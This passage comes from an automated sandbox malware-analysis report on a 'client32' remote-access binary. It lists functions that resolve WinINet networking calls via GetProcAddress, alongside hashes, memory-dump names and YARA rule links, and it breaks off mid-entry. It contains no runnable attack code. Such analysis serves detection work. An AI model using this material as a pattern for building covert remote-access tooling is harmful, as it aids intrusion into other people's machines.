Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
Instruction ID: ac41a9a0db9df06f4d8a16ffcac00abdbc7d2a047ef6ca5be1778eb271469bd1
Opcode Fuzzy Hash: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
Instruction Fuzzy Hash: A8F0A479A0412D7BDB40DAA8DC40BEEFBBD9B45A04F4040EDEA45A7240DF306E498BA5

Function 68594C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetConnectA), ref: 68594C84
SetLastError.KERNEL32(00000078), ref: 68594CBD

Strings

InternetConnectA, xrefs: 68594C7E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetConnectA
API String ID: 199729137-3259999732
Opcode ID: 830954cbed1c9144f6a3e8e6539191faf960695e30a89be9ba93378ba3d2f690
Instruction ID: 5d831db985c50f7d966cd4c67251dfeba661d74cfba861112c59a7c4d6ed8f97
Opcode Fuzzy Hash: 830954cbed1c9144f6a3e8e6539191faf960695e30a89be9ba93378ba3d2f690
Instruction Fuzzy Hash: 4EF01472610618AFCB20DFA8D844E9BB7E8EB8C711F01861AF919D3240D630EC11CFA4

Function 68594E20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 68594E34
SetLastError.KERNEL32(00000078), ref: 68594E6D

Strings

HttpOpenRequestA, xrefs: 68594E2E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: HttpOpenRequestA
API String ID: 199729137-1149044843
Opcode ID: 1c8570bd4916be9700ae4b1e1f0dc0c05ceafc9a6992f85010464a5eb1ad4d85
Instruction ID: 3259aee81dddc5ee95019deda423f274853b4f5c0a502156a7870dbdbfb7a394
Opcode Fuzzy Hash: 1c8570bd4916be9700ae4b1e1f0dc0c05ceafc9a6992f85010464a5eb1ad4d85
Instruction Fuzzy Hash: 9BF04972610618AFCB10DF98D884E9B77E8EF8C711F41851AFD29D3240D630EC51CBA0

Function 685AC8E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,?), ref: 685AC90B

Strings

pszBuffer[1024]==0, xrefs: 685AC923
NSMString.cpp, xrefs: 685AC91E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: wvsprintf
String ID: NSMString.cpp$pszBuffer[1024]==0
API String ID: 2795597889-2173072673
Opcode ID: e326bd9eea96bac73fc01c109a361f52e4cb0ee9fba3d42dc8b7c2656caf18f7
Instruction ID: 9a882c9afa223aba9d2d34692fe154f7792eefcd4734c275cc3d0534e1e4a9f7
Opcode Fuzzy Hash: e326bd9eea96bac73fc01c109a361f52e4cb0ee9fba3d42dc8b7c2656caf18f7
Instruction Fuzzy Hash: 72F04476900118BBCB00DA98DC40AFEBBA99B85204F404199EA09A7140DB306E4587A5

Function 110CF0A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\CTL32\NSMString.cpp, xrefs: 110CF0DE
pszBuffer[1024]==0, xrefs: 110CF0E3

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
Instruction ID: b1f8247c4ebfb1806b65041ddde5ed66821e01f400e323cd5dcc56784af5e4be
Opcode Fuzzy Hash: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
Instruction Fuzzy Hash: 89F0A475A0012DBBDB50DA98DC80BEEFFAC9B45604F1040A9EA09A7140DF306A45C7A5

Function 685BA96A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 685B3B5E: __getptd.LIBCMT ref: 685B3B64
Part of subcall function 685B3B5E: __getptd.LIBCMT ref: 685B3B74

__getptd.LIBCMT ref: 685BA979

Part of subcall function 685B6F64: __getptd_noexit.LIBCMT ref: 685B6F67
Part of subcall function 685B6F64: __amsg_exit.LIBCMT ref: 685B6F74

__getptd.LIBCMT ref: 685BA987

Strings

csm, xrefs: 685BA995

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 2452e7b31edf34142d9f3851a69658c052941af2b49b5eb0351d6327035b76d5
Instruction ID: 0a6d87f664127e5c6888d0283175262549a19f15d066d2a150c10dab66bacf6b
Opcode Fuzzy Hash: 2452e7b31edf34142d9f3851a69658c052941af2b49b5eb0351d6327035b76d5
Instruction Fuzzy Hash: EC014B39802384CECB269F25D466BBCB3B6BF20215FD1442ED4A166690EB308D84EB91

Function 68594AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetOpenA), ref: 68594B04
SetLastError.KERNEL32(00000078), ref: 68594B31

Strings

InternetOpenA, xrefs: 68594AFE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetOpenA
API String ID: 199729137-3658917949
Opcode ID: 1a939df4539ed5fda9b0227a7b835f74ef9f6656686b518e5def76d83d8dcfa9
Instruction ID: 4075bdc7f060023ca68e93a22658de0ed33f96b985c3faad440cf37d02b4e267
Opcode Fuzzy Hash: 1a939df4539ed5fda9b0227a7b835f74ef9f6656686b518e5def76d83d8dcfa9
Instruction Fuzzy Hash: 0EF05E72604218AFCB10EFA8D844EAB77A9EF4C721F40851AFE19D7200D670EC10CFA4

Function 68594CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,InternetErrorDlg), ref: 68594CE4
SetLastError.KERNEL32(00000078,?,?,6859B4D8,00000000), ref: 68594D11

Strings

InternetErrorDlg, xrefs: 68594CDE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetErrorDlg
API String ID: 199729137-3951532234
Opcode ID: 12c0de2993450cc17055f95d9a5ad7d30ffb7a56117e2b6124ac411c16e0a659
Instruction ID: 7972de36393e1d260071a436ffb998e5433940cb293b89376e392852070acd64
Opcode Fuzzy Hash: 12c0de2993450cc17055f95d9a5ad7d30ffb7a56117e2b6124ac411c16e0a659
Instruction Fuzzy Hash: 76F05E76641718AFCB10DF98D844EAB77ECEB48B21F40851AFE1997201C770EC50CBA4

Function 68594ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 68594EE4
SetLastError.KERNEL32(00000078,00000000,?,6859B3E2,00000000,00000000,00000000,00000000,00000000), ref: 68594F11

Strings

HttpSendRequestA, xrefs: 68594EDE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: HttpSendRequestA
API String ID: 199729137-4278235638
Opcode ID: be6f82efae27c42d33fc735e13b726965d6b5a88b883a2f53884dc81059e8f37
Instruction ID: 086abdd35253e42db8f6821e2ea9f64691ca82b8908e1d1f03f69074cd61c358
Opcode Fuzzy Hash: be6f82efae27c42d33fc735e13b726965d6b5a88b883a2f53884dc81059e8f37
Instruction Fuzzy Hash: 27F03076640318AFC720DFA8D844D9B77A8EB48711F41891AFD1597200D770E854CBE0

Function 68594E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,HttpQueryInfoA), ref: 68594E94
SetLastError.KERNEL32(00000078,00000000,?,6859B421,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 68594EC1

Strings

HttpQueryInfoA, xrefs: 68594E8E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: HttpQueryInfoA
API String ID: 199729137-45432230
Opcode ID: 49cd550e5366f84bc8e0030a3eca37c820dcf5802ab93257dd3a5aed57e56bd4
Instruction ID: 1d5077fe36949f0c46a527b14fbbff9f4b4e893b883f5e891f31956b6c5c03ce
Opcode Fuzzy Hash: 49cd550e5366f84bc8e0030a3eca37c820dcf5802ab93257dd3a5aed57e56bd4
Instruction Fuzzy Hash: AFF03A72A50228AFCB10DF99D848E9B77A8EF48721F40C41ABD69D7200D670E8508BA1

Function 68594F20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 68594F34
SetLastError.KERNEL32(00000078,00000000,?,6859B614), ref: 68594F61

Strings

HttpSendRequestExA, xrefs: 68594F2E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: HttpSendRequestExA
API String ID: 199729137-1584202490
Opcode ID: 843b7ffc316a958f94a90fea1431fde08f668c9f2ed2f60bf0b2962fded3323f
Instruction ID: 54bded41a36acfd5e9877644620938bcf6cde8d2d0204237e76dcd5a7ce569f2
Opcode Fuzzy Hash: 843b7ffc316a958f94a90fea1431fde08f668c9f2ed2f60bf0b2962fded3323f
Instruction Fuzzy Hash: 47F03A72611218AFCB20EF98E844EAB77A9EB48B61F40851AFD19D7200D670E8108BF1

Function 685A6FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685A6FDE
ctl_pittmanfunc.HTCTL32(?,00000001,?,00000050,?,00000004,00000000,00000000,?,00000000,00000050), ref: 685A7018

Part of subcall function 685A62B0: _memset.LIBCMT ref: 685A62F6
Part of subcall function 685A62B0: SetLastError.KERNEL32(00000057), ref: 685A65A3

Strings

P, xrefs: 685A7011

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memset$ErrorLastctl_pittmanfunc
String ID: P
API String ID: 2926529296-3110715001
Opcode ID: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
Instruction ID: c71df5102dbccd8cab67c8c91b709086a3674d9203fc8fc5a1f4de7564754f37
Opcode Fuzzy Hash: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
Instruction Fuzzy Hash: A4F0BDB5A4030CABDF14CFD4DC82FAE77B9AB48700F104119FA18AB3C4D7B0A9108BA5

Function 68594B40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68594B54
SetLastError.KERNEL32(00000078), ref: 68594B7D

Strings

InternetQueryDataAvailable, xrefs: 68594B4E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetQueryDataAvailable
API String ID: 199729137-452555236
Opcode ID: 5f02af7f4d7dc83bee59837814a22186f1d940bbd71c855ffc528cfc155dbd84
Instruction ID: 1d06a72440f85685e28a699fea80b8ea35f5f9f29c9bc158c4639bb2dbe601f8
Opcode Fuzzy Hash: 5f02af7f4d7dc83bee59837814a22186f1d940bbd71c855ffc528cfc155dbd84
Instruction Fuzzy Hash: B9F05E72615218AFCB60DF94D944E9B77A8EB48721F40441AFD55D7640C670F8108FA4

Function 68594BE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68594BF4
SetLastError.KERNEL32(00000078), ref: 68594C1D

Strings

InternetReadFile, xrefs: 68594BEE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetReadFile
API String ID: 199729137-1824561397
Opcode ID: 171890c2d46719c68e062ee8231ae023f816c0bb4ff5e3c6d71c6ac619cdb34e
Instruction ID: b84ea583bbcc67d6cc27af3fec8a90da1cbf4919c96fbab9915af0e8229afa19
Opcode Fuzzy Hash: 171890c2d46719c68e062ee8231ae023f816c0bb4ff5e3c6d71c6ac619cdb34e
Instruction Fuzzy Hash: C8F05872600218AFCB20DFA8D944A9B77A8FB48721F81881AFD5697640C6B0F850CFA4

Function 68594B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 68594BA4
SetLastError.KERNEL32(00000078,000000C8,?,6859B53C,00000000,0000002B,?,?), ref: 68594BCD

Strings

InternetQueryOptionA, xrefs: 68594B9E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetQueryOptionA
API String ID: 199729137-3310327128
Opcode ID: b3f158f16bdc877d47d34436011f2b095c5cc03ca4452db047ccf745d165a882
Instruction ID: 6eccc79f102b8c84b26900e81eded329f77cfdf4d193dfedc003adb4f3af22f3
Opcode Fuzzy Hash: b3f158f16bdc877d47d34436011f2b095c5cc03ca4452db047ccf745d165a882
Instruction Fuzzy Hash: 2DF05872654658AFCB60DF98D884E9B73A9EB48721F80881AFD5697640C670F8508BA0

Function 68594D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 68594D44
SetLastError.KERNEL32(00000078,00000000,?,6859B392,00000000,0000002B,?,?), ref: 68594D6D

Strings

InternetSetOptionA, xrefs: 68594D3E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetSetOptionA
API String ID: 199729137-1247460590
Opcode ID: 759d92660f808d16553d6265617f482f28c7bc787751c4b51a1b269162f63ea5
Instruction ID: 8d72b28d78eb7d714cb1b389e3a823e420d7993e40cab24d0e1aa81440896138
Opcode Fuzzy Hash: 759d92660f808d16553d6265617f482f28c7bc787751c4b51a1b269162f63ea5
Instruction Fuzzy Hash: C6F01276654728AFC720DF94D848E9B77ACEB48B11F41445AFE69D7240C671EC10CBA4

Function 68594DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 68594DE4
